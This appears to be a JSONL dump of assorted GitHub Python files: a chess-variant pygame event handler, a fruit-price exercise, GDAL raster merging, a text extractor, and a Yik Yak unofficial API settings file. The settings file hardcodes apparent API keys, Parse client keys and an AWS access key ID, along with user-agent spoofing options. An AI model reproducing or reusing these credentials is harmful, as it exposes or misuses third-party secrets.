+{"seq_id":"770355027","text":"import os\nimport sys\n\ndef script_path():\n    path = os.path.realpath(os.path.dirname(sys.argv[0]))\n    os.chdir(path) #it seems to be quite important\n    return path\n\ndef read_file(file_name, rmnl=False):\n    '''read the specified file, removing newlines depending on the \"rmnl\" parameter'''\n    path = os.path.realpath(os.path.dirname(sys.argv[0]))\n    path = os.path.join(path, file_name)\n    try:\n        with open(path, \"r\") as file:\n            if rmnl:\n                fileContent = file.read().splitlines()\n            else:\n                fileContent = file.readlines()\n    except:\n        fileContent = []\n    return fileContent\n\ndef simple_write(file, list_content):\n    '''write the items of list_content to the given .txt file, one per line'''\n    with open(file, \"w\") as f:\n        for line in list_content:\n            try:\n                f.write(\"{}\".format(line) + \"\\n\")\n            except:\n                print('could not write: {}'.format(line))\n        f.close()\n    return True\n\nif __name__ == \"__main__\":\n    file = \"country_list_by_cute_baby_names.txt\"\n    content = read_file(file, rmnl=True)\n    content = list(set([item.split(\" in \")[1].split(\"\\t\")[0] for item in content if item.strip()]))\n    content.sort()\n    print(content)\n
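    # Hypothetical extension (the output filename is an assumption, not part of the original script): persist the deduplicated, sorted country list using the module's own simple_write() helper.\n    simple_write('country_list_extracted.txt', content)\n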
","repo_name":"streanger/person-generator","sub_path":"scripts_for_use/extract_column.py","file_name":"extract_column.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"43313990932","text":"import sys\r\n\r\nimport pygame\r\nimport pygame.event\r\nfrom typing import Optional, Tuple\r\n\r\nfrom custom_types import Position\r\nimport draw_utils as du\r\nimport event_utils as eu\r\nfrom games import games\r\nfrom main_config import game, select_snd, play\r\nimport utils\r\n\r\nMousePos = Tuple[int, int]\r\n\r\n\r\ndef _select_game_mouse_event(mpos: MousePos):\r\n '''ゲームの種類の選択'''\r\n base_index = 10 * (game.page - 1)\r\n for i in range(2):\r\n for j in range(5):\r\n index = base_index + 5 * i + j\r\n if (index < len(games)\r\n and du.on_button(mpos, (40 + 460 * i, 40 + 160 * j), (420, 120))):\r\n eu.decide_game_event(index)\r\n return\r\n total_pages = len(games) // 10 + 1\r\n # 前のページへ\r\n if du.on_button(mpos, (260, 860), (130, 40)):\r\n eu.prev_page_event(total_pages)\r\n # 次のページへ\r\n elif du.on_button(mpos, (570, 860), (130, 40)):\r\n eu.next_page_event(total_pages)\r\n\r\n\r\ndef _select_game_key_event(key: int):\r\n '''ゲームの種類の選択画面'''\r\n # [0-9] ゲームの種類の選択\r\n if ord('0') <= key <= ord('9'):\r\n index = 10 * (game.page - 1) + key - 48\r\n if (index < len(games)):\r\n eu.decide_game_event(index)\r\n return\r\n total_pages = len(games) // 10 + 1\r\n # [←] 前のページへ\r\n if key == pygame.K_LEFT:\r\n eu.prev_page_event(total_pages)\r\n # [→] 次のページへ\r\n elif key == pygame.K_RIGHT:\r\n eu.next_page_event(total_pages)\r\n\r\n\r\ndef _settings_mouse_event(mpos: MousePos):\r\n '''色・モードなどの設定'''\r\n # 色\r\n if du.on_button(mpos, (120, 270), (300, 120)) and game.my_color == 'B':\r\n eu.select_color_event('W')\r\n elif du.on_button(mpos, (540, 270), (300, 120)) and game.my_color == 'W':\r\n eu.select_color_event('B')\r\n # モード\r\n elif du.on_button(mpos, (120, 570), (300, 120)) and game.mode == 'PvsC':\r\n eu.select_mode_event('PvsP')\r\n elif du.on_button(mpos, (540, 570), (300, 120)) and game.mode == 'PvsP':\r\n eu.select_mode_event('PvsC')\r\n # レベル\r\n elif game.level:\r\n for i in range(1, 6):\r\n if du.on_button(mpos, (180 + 120 * i, 750), (64, 32)) and game.level != i:\r\n game.level = i\r\n play(select_snd)\r\n return\r\n # 先読みの有無\r\n if du.on_button(mpos, (300, 840), (40, 40)):\r\n eu.toggle_foreseeing_event()\r\n # もどる\r\n elif du.on_button(mpos, (30, 30), (210, 90)):\r\n eu.back_event()\r\n # 決定\r\n elif du.on_button(mpos, (720, 30), (210, 90)):\r\n eu.start_game_event()\r\n\r\n\r\ndef _settings_key_event(key: int):\r\n '''色・モードなどの設定'''\r\n # [w] / [b] 色\r\n if key == pygame.K_w and game.my_color == 'B':\r\n eu.select_color_event('W')\r\n elif key == pygame.K_b and game.my_color == 'W':\r\n eu.select_color_event('B')\r\n # [p] / [c] モード\r\n elif key == pygame.K_p and game.mode == 'PvsC':\r\n eu.select_mode_event('PvsP')\r\n elif key == pygame.K_c and game.mode == 'PvsP':\r\n eu.select_mode_event('PvsC')\r\n elif game.level:\r\n # [1-5] レベル\r\n if 49 <= key <= 53 and game.level != key - 48:\r\n game.level = key - 48\r\n play(select_snd)\r\n return\r\n # [f] 先読みの有無\r\n elif key == pygame.K_f:\r\n eu.toggle_foreseeing_event()\r\n return\r\n # [backspace] もどる\r\n if key == pygame.K_BACKSPACE:\r\n eu.back_event()\r\n # [enter] 決定\r\n elif key == pygame.K_RETURN:\r\n eu.start_game_event()\r\n\r\n\r\ndef _back_to_home_mouse_event(mpos: MousePos):\r\n '''ゲーム選択メニューに戻る'''\r\n # 戻る\r\n if 
du.on_button(mpos, (360, 480), (90, 60)):\r\n eu.back_to_home_event()\r\n # 戻らない\r\n elif du.on_button(mpos, (510, 480), (90, 60)):\r\n eu.cancel_back_to_home_event()\r\n\r\n\r\ndef _back_to_home_key_event(key: int):\r\n '''ゲーム選択メニューに戻る'''\r\n # [y] 戻る\r\n if key == pygame.K_y:\r\n eu.back_to_home_event()\r\n # [n] 戻らない\r\n elif key == pygame.K_n:\r\n eu.cancel_back_to_home_event()\r\n\r\n\r\ndef _pieces_action_mouse_event(mpos: MousePos):\r\n '''駒の動作'''\r\n assert game.kind is not None\r\n _pos = du.parse_mouse(mpos, game.kind['size'], game.my_color == 'B')\r\n # アーチャーの発射\r\n if game.arrow_targets:\r\n eu.archer_attack_event(_pos)\r\n # 駒を移動させる\r\n else:\r\n eu.move_pieces_event(_pos)\r\n\r\n\r\ndef _specify_destination_key_event(key: int):\r\n '''移動先のマスを指定'''\r\n # [g] コマンドの記録を開始\r\n if key == pygame.K_g and game.dest_cmd is None:\r\n game.show_value = False\r\n game.show_user_guide = False\r\n game.dest_cmd = ''\r\n # [a-l] ファイルを指定\r\n elif ord('a') <= key <= ord('l') and game.dest_cmd == '':\r\n game.dest_cmd += chr(key)\r\n # [0-9] ランクを指定\r\n elif ord('0') <= key <= ord('9') and game.dest_cmd is not None and len(game.dest_cmd) < 3:\r\n game.dest_cmd += chr(key)\r\n # [enter] 確定・選択\r\n elif key == pygame.K_RETURN and game.dest_cmd:\r\n assert game.kind is not None\r\n _size = game.kind['size']\r\n _current = game.selecting_square or (0, 0)\r\n # ファイル\r\n # 指定されていたらそれを使う\r\n if 0 <= ord(game.dest_cmd[0]) - 97 < _size:\r\n _file = ord(game.dest_cmd[0]) - 97\r\n # 指定されていなかったら現在のものを使う\r\n else:\r\n _file = _current[0]\r\n # ランク\r\n _num = int(''.join(c for c in game.dest_cmd if c.isdigit()) or 0)\r\n # 指定されていたらそれを使う\r\n if 1 <= _num <= _size:\r\n _rank = _num - 1\r\n # 指定されていなかったら現在のものを使う\r\n else:\r\n _rank = _current[1]\r\n game.selecting_square = (_file, _rank)\r\n game.dest_cmd = None\r\n\r\n\r\ndef _specify_repeat_key_event(key: int):\r\n '''コマンド繰り返し回数の指定'''\r\n # [0-9] コマンド繰り返し回数の指定\r\n if ord('0') <= key <= ord('9'):\r\n game.show_value = False\r\n game.show_user_guide = False\r\n if game.cmd_repeat_num is None:\r\n if key == ord('0'):\r\n return\r\n game.cmd_repeat_num = chr(key)\r\n elif len(game.cmd_repeat_num) < 2:\r\n game.cmd_repeat_num += chr(key)\r\n\r\n\r\ndef _nav_square_key_event(key: int, shift: int, sel_sq: Optional[Position], rep: int):\r\n '''左/下/上/右の(駒のある)マス、左上/右上/左下/右下のマスを選択'''\r\n assert game.kind is not None\r\n _size = game.kind['size']\r\n _revesed = game.my_color == 'B'\r\n\r\n # [h][j][k][l] 左/下/上/右のマスを選択\r\n # [H][J][K][L] 左/下/上/右の次の駒があるマスを選択\r\n # [e][r][d][f] 左上/右上/左下/右下のマスを選択\r\n if key not in (pygame.K_h, pygame.K_j, pygame.K_k, pygame.K_l,\r\n pygame.K_e, pygame.K_r, pygame.K_d, pygame.K_f):\r\n return\r\n\r\n game.show_value = False\r\n game.show_user_guide = False\r\n game.cmd_repeat_num = None\r\n\r\n _left_key = pygame.K_l if _revesed else pygame.K_h\r\n _down_key = pygame.K_k if _revesed else pygame.K_j\r\n _up_key = pygame.K_j if _revesed else pygame.K_k\r\n _right_key = pygame.K_h if _revesed else pygame.K_l\r\n _lu_key = pygame.K_f if _revesed else pygame.K_e\r\n _ru_key = pygame.K_d if _revesed else pygame.K_r\r\n _ld_key = pygame.K_r if _revesed else pygame.K_d\r\n _rd_key = pygame.K_e if _revesed else pygame.K_f\r\n\r\n if sel_sq is None:\r\n game.selecting_square = game.startpos or (0, 0)\r\n elif key == _left_key and sel_sq[0] > 0:\r\n if shift:\r\n _x_list = sorted(x for x, y in game.gameboard if x < sel_sq[0] and y == sel_sq[1])\r\n if len(_x_list) > 0:\r\n _new_x = _x_list[-min(len(_x_list), rep)]\r\n else:\r\n return\r\n else:\r\n _new_x 
= max(0, sel_sq[0] - rep)\r\n game.selecting_square = _new_x, sel_sq[1]\r\n elif key == _down_key and sel_sq[1] > 0:\r\n if shift:\r\n _y_list = sorted(y for x, y in game.gameboard if x == sel_sq[0] and y < sel_sq[1])\r\n if len(_y_list) > 0:\r\n _new_y = _y_list[-min(len(_y_list), rep)]\r\n else:\r\n return\r\n else:\r\n _new_y = max(0, sel_sq[1] - rep)\r\n game.selecting_square = sel_sq[0], _new_y\r\n elif key == _up_key and sel_sq[1] < _size - 1:\r\n if shift:\r\n _y_list = sorted(y for x, y in game.gameboard if x == sel_sq[0] and y > sel_sq[1])\r\n if len(_y_list) > 0:\r\n _new_y = _y_list[min(len(_y_list), rep) - 1]\r\n else:\r\n return\r\n else:\r\n _new_y = min(_size - 1, sel_sq[1] + rep)\r\n game.selecting_square = sel_sq[0], _new_y\r\n elif key == _right_key and sel_sq[0] < _size - 1:\r\n if shift:\r\n _x_list = sorted(x for x, y in game.gameboard if x > sel_sq[0] and y == sel_sq[1])\r\n if len(_x_list) > 0:\r\n _new_x = _x_list[min(len(_x_list), rep) - 1]\r\n else:\r\n return\r\n else:\r\n _new_x = min(_size - 1, sel_sq[0] + rep)\r\n game.selecting_square = _new_x, sel_sq[1]\r\n elif key == _lu_key and sel_sq[0] > 0 and sel_sq[1] < _size - 1:\r\n game.selecting_square = max(0, sel_sq[0] - rep), min(_size - 1, sel_sq[1] + rep)\r\n elif key == _ru_key and sel_sq[0] < _size - 1 and sel_sq[1] < _size - 1:\r\n game.selecting_square = min(_size - 1, sel_sq[0] + rep), min(_size - 1, sel_sq[1] + rep)\r\n elif key == _ld_key and sel_sq[0] > 0 and sel_sq[1] > 0:\r\n game.selecting_square = max(0, sel_sq[0] - rep), max(0, sel_sq[1] - rep)\r\n elif key == _rd_key and sel_sq[0] < _size - 1 and sel_sq[1] > 0:\r\n game.selecting_square = min(_size - 1, sel_sq[0] + rep), max(0, sel_sq[1] - rep)\r\n\r\n\r\ndef _select_candidates_key_event(key: int, shift: int, sel_sq: Optional[Position], rep: int):\r\n '''行先・矢のターゲットの候補を選択'''\r\n # [n]/[N] 次/前の候補を選択\r\n if key != pygame.K_n:\r\n return\r\n\r\n game.show_value = False\r\n game.show_user_guide = False\r\n game.cmd_repeat_num = None\r\n _pos_candidates = None\r\n # 矢のターゲット\r\n if game.arrow_targets:\r\n _pos_candidates = sorted(game.arrow_targets)\r\n # 行先\r\n elif game.startpos is not None:\r\n _pos_candidates = game.valid_moves(game.gameboard[game.startpos], game.startpos)\r\n # 候補の選択\r\n if _pos_candidates is None:\r\n return\r\n\r\n if sel_sq in _pos_candidates:\r\n _new_index = (_pos_candidates.index(sel_sq) + (-rep if shift else rep)) % len(_pos_candidates)\r\n else:\r\n _new_index = -rep if shift else 0\r\n game.selecting_square = _pos_candidates[_new_index]\r\n\r\n\r\ndef _select_square_key_event(key: int, shift: int):\r\n '''位置の選択・駒の移動'''\r\n if game.cmd_repeat_num is None:\r\n _specify_destination_key_event(key)\r\n if game.dest_cmd is None:\r\n _sel_sq = game.selecting_square\r\n _rep = int(game.cmd_repeat_num or '1')\r\n _specify_repeat_key_event(key)\r\n _nav_square_key_event(key, shift, _sel_sq, _rep)\r\n _select_candidates_key_event(key, shift, _sel_sq, _rep)\r\n\r\n\r\ndef _pieces_action_key_event(key: int, shift: int):\r\n '''駒の動作'''\r\n # 選択を確定する\r\n if key == pygame.K_RETURN and game.dest_cmd is None:\r\n # アーチャーの発射\r\n if game.arrow_targets:\r\n eu.archer_attack_event(game.selecting_square)\r\n # 駒の移動\r\n else:\r\n eu.move_pieces_event(game.selecting_square)\r\n game.show_value = False\r\n game.show_user_guide = False\r\n # マスを選択する\r\n _select_square_key_event(key, shift)\r\n\r\n\r\ndef _promotion_mouse_event(mpos: MousePos):\r\n '''プロモーション先の選択'''\r\n if not game.prom:\r\n return\r\n\r\n assert game.kind is not None\r\n assert 
game.endpos is not None\r\n _num = len(game.kind['promote2'])\r\n _piece_size = int(du.square_size(game.kind['size']))\r\n _area_size = _piece_size + 30\r\n _rect_width = _area_size * (_num % 4 if _num < 4 else 4)\r\n _rect_height = _area_size * (1 + (_num - 1) // 4)\r\n _rect_left = 480 - _rect_width // 2\r\n _rect_top = 480 - _rect_height // 2\r\n for i in range(_num):\r\n if du.on_button(mpos, (\r\n _rect_left + _area_size * (i % 4),\r\n _rect_top + _area_size * (i // 4),\r\n ), (_area_size, _area_size)):\r\n eu.promotion_event(i)\r\n return\r\n\r\n\r\ndef _promotion_key_event(key: int):\r\n '''プロモーション先の選択'''\r\n assert game.kind is not None\r\n assert game.endpos is not None\r\n _index = game.selecting_prom_piece_index\r\n if game.selecting_prom_piece_index is None:\r\n game.selecting_prom_piece_index = 0\r\n return\r\n assert _index is not None\r\n _promote_len = len(game.kind['promote2'])\r\n if key == pygame.K_LEFT:\r\n game.selecting_prom_piece_index -= 0 if _index % 4 == 0 else 1\r\n elif key == pygame.K_UP:\r\n game.selecting_prom_piece_index -= 4 if _index // 4 > 0 else 0\r\n elif key == pygame.K_RIGHT:\r\n game.selecting_prom_piece_index += 0 if _index % 4 == 3 else 1\r\n elif key == pygame.K_DOWN:\r\n game.selecting_prom_piece_index += 4 if _index // 4 <= _promote_len // 4 else 0\r\n elif key == pygame.K_RETURN:\r\n eu.promotion_event(_index)\r\n return\r\n if game.selecting_prom_piece_index > _promote_len - 1:\r\n game.selecting_prom_piece_index = _promote_len - 1\r\n\r\n\r\ndef _castling_confirmation_mouse_event(mpos: MousePos):\r\n '''キャスリングするかどうかの確認'''\r\n if not game.confirm_castling:\r\n return\r\n\r\n # する\r\n _on_yes_button = du.on_button(mpos, (360, 480), (90, 60))\r\n _on_no_button = False\r\n if _on_yes_button:\r\n game.do_castling = True\r\n else:\r\n # しない\r\n _on_no_button = du.on_button(mpos, (510, 480), (90, 60))\r\n if _on_no_button:\r\n game.do_castling = False\r\n\r\n if _on_yes_button or _on_no_button:\r\n eu.castling_event()\r\n\r\n\r\ndef _castling_confirmation_key_event(key: int):\r\n '''キャスリングするかどうかの確認'''\r\n # [y] する\r\n if key == pygame.K_y:\r\n game.do_castling = True\r\n # [n] しない\r\n elif key == pygame.K_n:\r\n game.do_castling = False\r\n if key in (pygame.K_y, pygame.K_n):\r\n eu.castling_event()\r\n\r\n\r\ndef _board_back_forward_key_event(key: int):\r\n '''盤面を戻したり進めたりするキーボードイベント'''\r\n if game.prom or game.confirm_castling or game.moving or game.arrow_targets != set():\r\n return\r\n\r\n # [z] 一手戻す\r\n if key == pygame.K_z:\r\n game.prev_move()\r\n if game.mode == 'PvsC':\r\n game.prev_move()\r\n # [x] 一手進める\r\n elif key == pygame.K_x:\r\n game.next_move()\r\n\r\n\r\ndef _game_key_event(key: int, mod: int):\r\n '''ゲーム中のキーボードイベント'''\r\n # [y] / [n] ゲーム選択メニューに戻るかの確認の決定\r\n if game.alert:\r\n _back_to_home_key_event(key)\r\n # [y] / [n] キャスリングするかの確認の決定\r\n elif game.confirm_castling:\r\n _castling_confirmation_key_event(key)\r\n # [←][⇡][→][↓][enter] プロモーション先の選択・決定\r\n elif game.prom:\r\n _promotion_key_event(key)\r\n else:\r\n # 駒の移動・矢の射撃\r\n _pieces_action_key_event(key, mod & pygame.KMOD_SHIFT)\r\n # [space] 駒の説明を表示\r\n if key == pygame.K_SPACE and game.startpos is not None:\r\n game.piece_for_description = game.gameboard[game.startpos].__class__.__name__\r\n game.time = 0\r\n game.show_value = False\r\n game.show_user_guide = False\r\n return\r\n # [backspace] ゲーム選択メニューに戻るかの確認\r\n if key == pygame.K_BACKSPACE:\r\n game.alert = True\r\n game.show_value = False\r\n game.show_user_guide = False\r\n return\r\n # [v] 駒の価値を表示する\r\n if key == 
pygame.K_v:\r\n game.show_value = not game.show_value\r\n game.show_user_guide = False\r\n return\r\n # [shift+/]/[?] ヘルプを表示する\r\n if key == pygame.K_SLASH and mod & pygame.KMOD_SHIFT:\r\n game.show_user_guide = not game.show_user_guide\r\n game.show_value = False\r\n return\r\n # [ctrl+s] ゲームデータのセーブ\r\n if key == pygame.K_s and mod & pygame.KMOD_CTRL:\r\n print('Save the data:\\nSet pick: true in one of the data saved in data.yml.')\r\n print('Then visit the same game again and type ctrl+L, or just run command with color option.\\n')\r\n utils.save_print(game)\r\n return\r\n # [ctrl+l] ゲームデータのロード\r\n if key == pygame.K_l and mod & pygame.KMOD_CTRL:\r\n game.load_data()\r\n return\r\n # [z] / [x] 一手戻す / 進める\r\n _board_back_forward_key_event(key)\r\n\r\n\r\ndef _left_mouse_event(pos: MousePos):\r\n '''左クリックイベント'''\r\n # ゲームの種類の選択\r\n if game.select_game:\r\n _select_game_mouse_event(pos)\r\n return\r\n # 色・モードなどの設定\r\n elif game.select_color:\r\n _settings_mouse_event(pos)\r\n return\r\n\r\n # ゲーム\r\n if game.alert:\r\n _back_to_home_mouse_event(pos)\r\n elif not game.show_value and not game.show_user_guide:\r\n _pieces_action_mouse_event(pos)\r\n _promotion_mouse_event(pos)\r\n _castling_confirmation_mouse_event(pos)\r\n game.selecting_square = game.cmd_repeat_num = game.dest_cmd = None\r\n\r\n\r\ndef _right_mouse_event(pos: MousePos):\r\n '''右クリックイベント'''\r\n assert game.kind is not None\r\n _pointing_coord = du.parse_mouse(pos, game.kind['size'], game.my_color == 'B')\r\n if (_pointing_coord in game.gameboard\r\n and not game.alert\r\n and not game.show_value\r\n and not game.show_user_guide):\r\n # 駒の説明を表示\r\n assert _pointing_coord is not None\r\n game.piece_for_description = game.gameboard[_pointing_coord].__class__.__name__\r\n game.time = 0\r\n else:\r\n # 駒選択解除\r\n game.startpos, game.endpos = None, None\r\n\r\n\r\ndef _mouse_event(pos: MousePos, button: int):\r\n '''マウス'''\r\n # 左\r\n if button == 1:\r\n _left_mouse_event(pos)\r\n # 右\r\n elif (button == 3\r\n and not (game.select_game or game.select_color)\r\n and not game.prom\r\n and not game.confirm_castling):\r\n _right_mouse_event(pos)\r\n\r\n\r\ndef _key_event(key: int, mod: int):\r\n # 閉じる\r\n if key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n # ゲームの種類の選択\r\n if game.select_game:\r\n _select_game_key_event(key)\r\n # 色・モードなどの設定\r\n elif game.select_color:\r\n _settings_key_event(key)\r\n # ゲーム中\r\n else:\r\n # 駒説明を非表示にする\r\n game.piece_for_description = None\r\n _game_key_event(key, mod)\r\n\r\n\r\ndef event():\r\n '''イベントハンドリング'''\r\n for event in pygame.event.get():\r\n # 閉じるボタン\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n # マウスクリック\r\n if (event.type == pygame.MOUSEBUTTONDOWN\r\n and not game.moving and game.shooting_target is None):\r\n _mouse_event(event.pos, event.button)\r\n # 右クリックを離したとき、駒説明を非表示にする\r\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 3:\r\n game.piece_for_description = None\r\n # キーボード\r\n elif (event.type == pygame.KEYDOWN\r\n and not game.moving and game.shooting_target is None):\r\n _key_event(event.key, event.mod)\r\n # スペースキーを離したとき、駒説明を非表示にする\r\n elif event.type == pygame.KEYUP and event.key == pygame.K_SPACE:\r\n game.piece_for_description = None\r\n","repo_name":"midorimici/fairy-chess","sub_path":"codes/main/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":18958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38213175187","text":"fruit = input()\r\nday = 
input()\r\nquantity = float(input())\r\nprice = 0\r\nif day == \"Sunday\" or day == \"Saturday\":\r\n if fruit == \"banana\":\r\n price = 2.70\r\n elif fruit == \"apple\":\r\n price = 1.25\r\n elif fruit == \"orange\":\r\n price = 0.90\r\n elif fruit == \"grapefruit\":\r\n price = 1.60\r\n elif fruit == \"kiwi\":\r\n price = 3.00\r\n elif fruit == \"pineapple\":\r\n price = 5.60\r\n elif fruit == \"grapes\":\r\n price = 4.20\r\n if price != 0:\r\n price = price * quantity\r\n print(f\"{price:.2f}\")\r\n else:\r\n print(\"error\")\r\nelif day == \"Monday\" or day == \"Tuesday\" or day == \"Wednesday\" or day == \"Thursday\" or day == \"Friday\":\r\n if fruit == \"banana\":\r\n price = 2.50\r\n elif fruit == \"apple\":\r\n price = 1.20\r\n elif fruit == \"orange\":\r\n price = 0.85\r\n elif fruit == \"grapefruit\":\r\n price = 1.45\r\n elif fruit == \"kiwi\":\r\n price = 2.70\r\n elif fruit == \"pineapple\":\r\n price = 5.50\r\n elif fruit == \"grapes\":\r\n price = 3.85\r\n if price != 0:\r\n price = price * quantity\r\n print(f\"{price:.2f}\")\r\n else:\r\n print(\"error\")\r\nelse:\r\n print(\"error\")","repo_name":"soxa2022/SoftUni_Python_Courses","sub_path":"Programming_basic_Python/conditional_statements_advanced_lab/fruit_shop.py","file_name":"fruit_shop.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"41305561614","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Settings for Yik Yak and Parse APIs\"\"\"\n\n# Yik Yak API Parameters\nYIKYAK_APIKEY = \"EF64523D2BD1FA21F18F5BC654DFC41B\"\nYIKYAK_ENDPOINT = \"https://us-central-api.yikyakapi.net/api/\"\nYIKYAK_VERSION = \"2.7.3\"\nYIKYAK_VERSION_LETTER = \"e\"\n\n\n# Parse API Parameters\nPARSE_APPID = \"wMkdjBI4ircsNcRn8mXnBkgH0dwOcrkexrdMY3vY\"\nPARSE_CLIENTKEY = \"GbNFwvFgoUu1wYuwIexNImy8bnSlNhqssG7gd53Y\"\nPARSE_ENDPOINT = \"https://api.parse.com/2/\"\nPARSE_VERSION = \"1.7.1\"\nPARSE_VERSION_LETTER = \"a\"\nPARSE_BUILD = \"59\"\nPARSE_API_LEVEL = \"22\"\n\n\n# Notify API Parameters\nNOTIFY_ENDPOINT = \"https://notify.yikyakapi.net/api/\"\n\n\n# Basecamp API Parameters\nBASECAMP_ENDPOINT = \"https://bc.yikyakapi.net/api/\"\n\n\n# Amazon S3 API Parameters (AWS_SECRET_KEY unknown)\nAWS_ACCESS_KEY = \"AKIAJFD2ANADKEMPW52A\"\nAWS_BUCKET = \"photos-upload-yy\"\nAWS_SECRET_KEY = None\nAWS_UPLOAD_ENDPOINT = \"http://signedup.yikyakapi.net/upload\"\n\n\n# Yik Yak Settings Parameters\nALLOWED_SITES_URL = \"http://lv.yikyakapi.net/getSites\"\nCONFIG_URL = \"https://d3436qb9f9xu23.cloudfront.net/yikyak-config-android.json\"\n\n\n# Device Settings (for User Agent)\nVM_TYPE = \"Dalvik\"\nVM_VERSION = \"1.6.0\"\nANDROID_VERSION = \"4.0.5\"\nDEVICE = \"google_sdk\"\nBUILD = \"MR1\"\n\n\n# Options for randomize_user_agent()\nVM_VERSIONS = [\"1.7.0\", \"1.8.0\", \"1.8.1\"]\nANDROID_VERSIONS = [\"4.0.4\", \"4.5\", \"4.3\", \"5.1\"]\nBUILD_STRING_LENGTHS = [3, 4, 5]\nDEVICES = [\"Nexus 4\", \"Nexus 5\", \"HTC One_M8\", \"SM-N900V\", \"XT1080\",\n \"SM-G900V\", \"SCH-I545\", \"Android SDK built for x86\"]\n\n\n# Randomization options\nRANDOMIZE_USER_AGENT = True\nRANDOMIZE_ENDPOINT = False\nLOCATIONIZE_ENDPOINT = False\n\n\n# Logging options\nLOG_USERIDS = True\n\n\n# Other Yik Yak-related parameters\nNO_YAKS_MESSAGE_ID = \"Y/b3c6c56b0305f2bc794e40b504f7150f\"\nTOO_CLOSE_TO_SCHOOL_MESSAGE_ID = \"Y/1687dcbe8ca5a308d46c44343a4c69eb\"\nCONTACT_US_REASONS = [\"My Basecamp location is wrong.\",\n \"I'm not near a high school but it says I am! 
Help!\",\n \"I want my college to be a Peek location!\",\n \"I have a really cool idea for the app.\",\n \"Yik Yak isn't working properly on my phone.\",\n \"Someone posted something and I want it taken down.\",\n \"My Yakarma has been reset.\", \"I forgot my pin code.\",\n \"Other\"]\n","repo_name":"akashlevy/Yaklient","sub_path":"yaklient/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"5240411344","text":"import numpy as np\n\n\ndataPath = './'\n\npapers = np.loadtxt(dataPath + 'papers.tsv', delimiter='\\t', comments=None, dtype=str)\nvolumes = np.loadtxt(dataPath + 'volumes.tsv', delimiter='\\t', comments=None, dtype=str)\n\nvenues = {}\nfor volume in volumes:\n volumeId=volume[0]\n fileId=volumeId[0:volumeId.rfind('.')]\n if fileId not in venues:\n venues[fileId]=([],[],volume[1])\n year=volume[2]\n location=volume[3]\n if ('online' in location.lower()) or ('virtual' in location.lower()) :\n location='@'\n venues[fileId][0].append(year)\n venues[fileId][1].append(location)\n\nout=open(dataPath+'venues.tsv','w')\nfor venue in venues:\n out.write(venue)\n years, pos = np.unique(venues[venue][0], return_inverse=True)\n bestPos = np.bincount(pos).argmax()\n out.write('\\t' + years[bestPos])\n locations, pos = np.unique(venues[venue][1], return_inverse=True)\n bestPos = np.bincount(pos).argmax()\n out.write('\\t' + locations[bestPos])\n out.write('\\t' + venues[venue][2])\n out.write('\\n')\nout.close()\n","repo_name":"piotrmp/nlp_geography","sub_path":"nlpgeo_code/refine1.py","file_name":"refine1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38306612427","text":"######################################################################\n# each raster in a directory is merged into one raster that \n# displays the waterway occupancy\n######################################################################\n\nimport os\nimport functools\nimport numpy as np\nfrom osgeo import gdal, osr, ogr\n\ndef add_rasters(base_path=r\"D:\\Users\\krob\\Documents\\AIS\\Scripts\\output_rws\\track_tiff\\individual_rasters\"):\n for counter, directory in enumerate(os.listdir(base_path)):\n \n # settings for output raster layer\n output = r\"D:\\Users\\krob\\Documents\\AIS\\Scripts\\output_rws\\track_tiff\\total_rasters\\{}_wgs84.tif\".format(directory)\n pixel_size = 0.025\n\n extent_shp = ogr.Open(r\"D:\\Users\\krob\\Documents\\AIS\\extent.shp\")\n extent_layer = extent_shp.GetLayer()\n x_min, x_max, y_min, y_max = extent_layer.GetExtent()\n\n x_res = int((x_max - x_min) / pixel_size)\n y_res = int((y_max - y_min) / pixel_size)\n\n raster_total_array = []\n\n # set spatial reference system\n srs = osr.SpatialReference()\n # srs.ImportFromEPSG(28992)\n srs.ImportFromEPSG(4326)\n dest_wkt = srs.ExportToWkt()\n\n for counter, filen in enumerate(os.listdir(r'{}\\{}'.format(base_path, directory))):\n # open raster file\n workfile = r'{}\\{}\\{}'.format(base_path, directory, filen)\n raster = gdal.Open(workfile, gdal.GA_Update)\n\n # set spatial reference\n raster.SetProjection(dest_wkt)\n\n # send raster as np array to raster_total_array\n raster_array = raster.ReadAsArray()\n raster_total_array.append(raster_array)\n\n # raster = None\n\n concat_raster = functools.reduce(lambda a, b: np.add(a, b), raster_total_array)\n\n target_ds = 
gdal.GetDriverByName('GTiff').Create(output, x_res, y_res, 1, gdal.GDT_Byte)\n target_ds.SetGeoTransform((x_min, pixel_size, 0, y_max, 0, -pixel_size))\n target_ds.SetProjection(dest_wkt)\n\n target_ds.GetRasterBand(1).WriteArray(concat_raster)\n\n target_ds.FlushCache()\n","repo_name":"bkronemeijer/internship","sub_path":"add_rasters.py","file_name":"add_rasters.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"29531453137","text":"title = \"Fetching data from a CSW catalog\"\nname = '2015-10-12-fetching_data'\n\nget_ipython().magic('matplotlib inline')\nimport seaborn\nseaborn.set(style='ticks')\n\nimport os\nfrom datetime import datetime\nfrom IPython.core.display import HTML\n\nimport warnings\nwarnings.simplefilter(\"ignore\")\n\n# Metadata and markdown generation.\nhour = datetime.utcnow().strftime('%H:%M')\ncomments = \"true\"\n\ndate = '-'.join(name.split('-')[:3])\nslug = '-'.join(name.split('-')[3:])\n\nmetadata = dict(title=title,\n date=date,\n hour=hour,\n comments=comments,\n slug=slug,\n name=name)\n\nmarkdown = \"\"\"Title: {title}\ndate: {date} {hour}\ncomments: {comments}\nslug: {slug}\n\n{{% notebook {name}.ipynb cells[2:] %}}\n\"\"\".format(**metadata)\n\ncontent 